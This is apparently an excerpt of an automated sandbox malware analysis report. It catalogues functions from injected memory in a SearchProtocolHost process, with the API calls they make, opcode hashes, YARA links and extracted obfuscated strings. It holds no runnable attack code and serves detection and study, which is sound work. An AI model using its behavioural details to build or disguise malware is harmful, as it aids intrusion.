                                                                                                                                                                                  • Opcode Fuzzy Hash: 38580999aaf99117114d273f89efd2578bdd12a5eeeabbc80364d0ff1e678916
                                                                                                                                                                                  • Instruction Fuzzy Hash: E921447254865A9FCB05DFF8E841BE5B764CF49324F104794DCACAB2D1EB205D12C782
                                                                                                                                                                                  Function 00124819 Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00124892
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  • Opcode ID: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                                                                                                                                                  • Instruction ID: bc7a2ee9d00970cb5901d613770fe3cf5d8ddfd30facfa9acda098b7baf8f116
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                                                                                                                                                  • Instruction Fuzzy Hash: A70152B5E5014AABDF10DAE0EC42F9DB7689B54308F0042A9E9189B281F731E659C791
                                                                                                                                                                                  Function 00124820 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00124892
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  • Opcode ID: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                                                                                                                  • Instruction ID: 4e40b438d9b82f5db8ba5f36778a9ceafffdeaf3ad364bceedaf840b5d66b573
                                                                                                                                                                                  • Opcode Fuzzy Hash: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9201DEB5D4020DABDF10DAE5EC42F9EB7B8AB64308F044595E908A7241F671EB58CB91
                                                                                                                                                                                  Function 00139AC0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,001285DE,00000010,?,?,?,00000044,?,00000010,001285DE,?,?,?), ref: 00139B23
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateInternalProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2186235152-0
                                                                                                                                                                                  • Opcode ID: 9ca81906a774322f318e096893a0ee57288e49d5298c7c64b5815489dfb80364
                                                                                                                                                                                  • Instruction ID: ea6e50c1cadf25a30921da13852c2b37712d9de8029f431780232bf6df0bed8f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ca81906a774322f318e096893a0ee57288e49d5298c7c64b5815489dfb80364
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E01D2B2210108BBCB04DF99DC81EDB77ADAF8C754F418208FA49E7240D630F8518BA5
                                                                                                                                                                                  Function 00119E40 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00119E81
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                  • Opcode ID: 897b5008a066ca781a9f9edfdb1018c822e6dcf4366a4ba6e097ef57d074295b
                                                                                                                                                                                  • Instruction ID: 25dfd9a1fd2edd4524b576142d4f71c25bc33c83213a4bdc0804bd50122c37f4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 897b5008a066ca781a9f9edfdb1018c822e6dcf4366a4ba6e097ef57d074295b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 61F06D7338020436E72075EDAC02FDBB78CCBD1BB1F140026FA0CEA1C1DA96B8814AE5
                                                                                                                                                                                  Function 00119E3E Relevance: 1.5, APIs: 1, Instructions: 31threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00119E81
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                  • Opcode ID: 9e635f60936242cedb424141fa78a542287fe07c6d5069c1c1935485f0b75a4b
                                                                                                                                                                                  • Instruction ID: c309f1188bd5cae73773094d3c6edaeba65859ef5ac06d8bd33d39e39bf04e63
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e635f60936242cedb424141fa78a542287fe07c6d5069c1c1935485f0b75a4b
                                                                                                                                                                                  • Instruction Fuzzy Hash: C4E0927224020036E32576D88C03FCBA79C8FD4761F250065FA08AB1C1DAA5B4814AA5
                                                                                                                                                                                  Function 001399E0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00121D39,?,00135AD7,00121D39,0013582F,00135AD7,?,00121D39,0013582F,00001000,?,?,00000000), ref: 00139A1F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                  • Opcode ID: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                                                                                                                                                  • Instruction ID: 9af228fb5a0279c3728572926572f9814dd73925d0dd34fd697d33b318e3f1d1
                                                                                                                                                                                  • Opcode Fuzzy Hash: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E065722003057BDB14EE99DC42FAB77ACEF89B54F004418FE49A7242D770B9108BB6
                                                                                                                                                                                  Function 00139A30 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,7CB0E851,00000007,00000000,00000004,00000000,001240A6,000000F4), ref: 00139A6F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                  • Opcode ID: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                                                                                                                  • Instruction ID: 7d69fa2e7b8f6dd774fb77d1c1c63d99e59278819e2185b4fc9cf687cda30a51
                                                                                                                                                                                  • Opcode Fuzzy Hash: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 60E065722002487BCB14EE99DC42FEB77ACEFC9714F004429FA09A7242C770B9108BB5
                                                                                                                                                                                  Function 00128619 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00128648
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                  • Opcode ID: f738cbb425e611d8e9e269ad94cf466be0197022c3636d257a479034ed59d302
                                                                                                                                                                                  • Instruction ID: 71e06269cb0baded73d340ff960d4a15c10874d0b0d4c6668b5096ad56f933ab
                                                                                                                                                                                  • Opcode Fuzzy Hash: f738cbb425e611d8e9e269ad94cf466be0197022c3636d257a479034ed59d302
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BE0D83014020467E7286764EC41B5533548B49321F144550FD6C8B2C2DB7DE9324190
                                                                                                                                                                                  Function 00128620 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00128648
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                  • Opcode ID: 855b8d50a8016bda6a6a97f31ff92b957c90bbdca47c53022890a0e2a56f69ba
                                                                                                                                                                                  • Instruction ID: b8e017b2ff07245d9fb74d8a04653e413c7d0f8caa6f5d7a5f9ffa640d3fe455
                                                                                                                                                                                  • Opcode Fuzzy Hash: 855b8d50a8016bda6a6a97f31ff92b957c90bbdca47c53022890a0e2a56f69ba
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CE086712412046BEB1466A8FC42B663358CB48765F144A60F82CDB2C1DA7EF9224160
                                                                                                                                                                                  Function 00128407 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00122030,0013816F,0013582F,00121FF6), ref: 0012843F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                  • Opcode ID: 119c9e1f68007de04e482f7eb05232315956690a884a29b287f5bc2f0f46cb40
                                                                                                                                                                                  • Instruction ID: 973b9437eac32b2eccde9cf4809efab1720eeed6c2202e9742743241f29e7f70
                                                                                                                                                                                  • Opcode Fuzzy Hash: 119c9e1f68007de04e482f7eb05232315956690a884a29b287f5bc2f0f46cb40
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CE0C2306802823BF701FBA48D42B597B8A9B20745F04005CB988E62C6CE15E1208622
                                                                                                                                                                                  Function 00128410 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00122030,0013816F,0013582F,00121FF6), ref: 0012843F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                  • Opcode ID: bfd20958474ed37cd433a6109d1ad55ec62e432b419dd531c5f2b1d0db490eae
                                                                                                                                                                                  • Instruction ID: adff2acde841adceee13cb7069c5549c74886b398f4cd17dc559abcbadb603d4
                                                                                                                                                                                  • Opcode Fuzzy Hash: bfd20958474ed37cd433a6109d1ad55ec62e432b419dd531c5f2b1d0db490eae
                                                                                                                                                                                  • Instruction Fuzzy Hash: 97D0A7716C03053BF650F6E8DC43F46328DDB64B91F104024BA4CE72C1DE55F4004567
                                                                                                                                                                                  Function 001248D3 Relevance: 1.5, APIs: 1, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00124892
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  • Opcode ID: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                                                                                                                                                  • Instruction ID: 38a8cda9770fa9dcda8bb5fc74ac941c21870eea2d5afb93af6992e3bd2541fd
                                                                                                                                                                                  • Opcode Fuzzy Hash: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                                                                                                                                                  • Instruction Fuzzy Hash: E3E01279A5010EABEB44CAC4D881FADB3A4EB08208F105285E91C97240D630AA55CB41
                                                                                                                                                                                  Function 00B62C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 994d943b929e8558b3a68d4cbfaf9659089e11ad60d22dd6a26259d1644a390a
                                                                                                                                                                                  • Instruction ID: 63246a73742578e3466ac4e09771869c7928fb8284b090500fc95bcd77205d7e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 994d943b929e8558b3a68d4cbfaf9659089e11ad60d22dd6a26259d1644a390a
                                                                                                                                                                                  • Instruction Fuzzy Hash: A5B09B729419C5C9EB11E760460C71B7940E7D0701F15C0B2D2170646E473CC5D1E175

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 009E04E8 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145710263.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_9e0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: dffcfc8d1bf7d449985e0110806286dec676aaf9a09f9f4bc9e2fc368ace8b7d
                                                                                                                                                                                  • Instruction ID: ec624c71fd83641df87bf88c3449238231dd9957121e91512e9383b125d37681
                                                                                                                                                                                  • Opcode Fuzzy Hash: dffcfc8d1bf7d449985e0110806286dec676aaf9a09f9f4bc9e2fc368ace8b7d
                                                                                                                                                                                  • Instruction Fuzzy Hash: C041E870508B4D4FC368EF6A9081776B3E5FBC9300F10062DE99AC3252EB74DC468785
                                                                                                                                                                                  Function 009EDFFA Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145710263.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_9e0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                  • API String ID: 0-3558027158
                                                                                                                                                                                  • Opcode ID: 6cba4c29fe6eb188de62f531a6f215d18f64100a94d38c6df01c95bdf134c95a
                                                                                                                                                                                  • Instruction ID: 685be9a29fd7af17e9ebfca19311fd8010562c70c1fff15b205da8046fe049e2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cba4c29fe6eb188de62f531a6f215d18f64100a94d38c6df01c95bdf134c95a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 84915FF04082988AC7158F55A0612AFFFB5EBC6305F15816DE7E6BB243C3BE8D058B85
                                                                                                                                                                                  Function 009E3CAE Relevance: 33.8, Strings: 27, Instructions: 96COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145710263.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_9e0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $Web$($hm$*661$*7*6$,FF5$-$Et$-$Ra$/$,O$1*4$$173*$3*71$4?$P$6$Ik$71/$Ik~m$LPIH$afOm$agok$evm+$fmha$hhe+$j+54$kqgl$oa$C$p+17$thaS$vwmk
                                                                                                                                                                                  • API String ID: 0-132586805
                                                                                                                                                                                  • Opcode ID: e48f924f4b741f707bdc201864ba7c3de32ecc9d62ad808335acddf26c4cf2b9
                                                                                                                                                                                  • Instruction ID: 7f7d7e25566a13cf7676253251c46ec7ec11ebfa44efe1ddece891b8ae5c5810
                                                                                                                                                                                  • Opcode Fuzzy Hash: e48f924f4b741f707bdc201864ba7c3de32ecc9d62ad808335acddf26c4cf2b9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E4186B041064CDBCF29EF44E545BED7BB0FF01314F819269E909AB292DB358A96CB85
                                                                                                                                                                                  Function 00B62890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                                  • Opcode ID: 846b9616baa130bd6c0bd5cec5fc8528f10093be80eebbbac11bfa8fa86f097d
                                                                                                                                                                                  • Instruction ID: ec9cbaebe02703ee5be92a220a58e3f0da02b441545993e0f1fd82ecb1b2f2d3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 846b9616baa130bd6c0bd5cec5fc8528f10093be80eebbbac11bfa8fa86f097d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5351B9B5A00516BFDF14DBA8889097EF7F8FB58301B54C1B9E465D7681D238DE408BE0
                                                                                                                                                                                  Function 00BD2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                                  • Opcode ID: 79182ba4643d336caadbbdaefb12ff8ff271cbe9972a83c8ae0887cbdb8110f9
                                                                                                                                                                                  • Instruction ID: 556ddb0db94c44626bf9db748b994ae15c12391856310970c539068cc6e9027c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 79182ba4643d336caadbbdaefb12ff8ff271cbe9972a83c8ae0887cbdb8110f9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 31510471A00685AECB20DF9CC99097EF7F8EB64304B50849BE599C3781F674EE408B60
                                                                                                                                                                                  Function 00B57630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00B94655
                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00B94742
                                                                                                                                                                                  • Execute=1, xrefs: 00B94713
                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00B946FC
                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00B94725
                                                                                                                                                                                  • ExecuteOptions, xrefs: 00B946A0
                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 00B94787
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                  • Opcode ID: b00ac53f80aee49e28ad02de77b54f3c37455928a8b831640b1dd3d297485bba
                                                                                                                                                                                  • Instruction ID: 7b1a566bfde5f37d0dd4904039579dcddc078c6b666f5f89733f0a5b3aaa0a2a
                                                                                                                                                                                  • Opcode Fuzzy Hash: b00ac53f80aee49e28ad02de77b54f3c37455928a8b831640b1dd3d297485bba
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9851F631744619AADF11ABA4FC8AFED77E8EB09301F1400E9E905A71D1EB709E498F51
                                                                                                                                                                                  Function 00BF6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmpDownload File
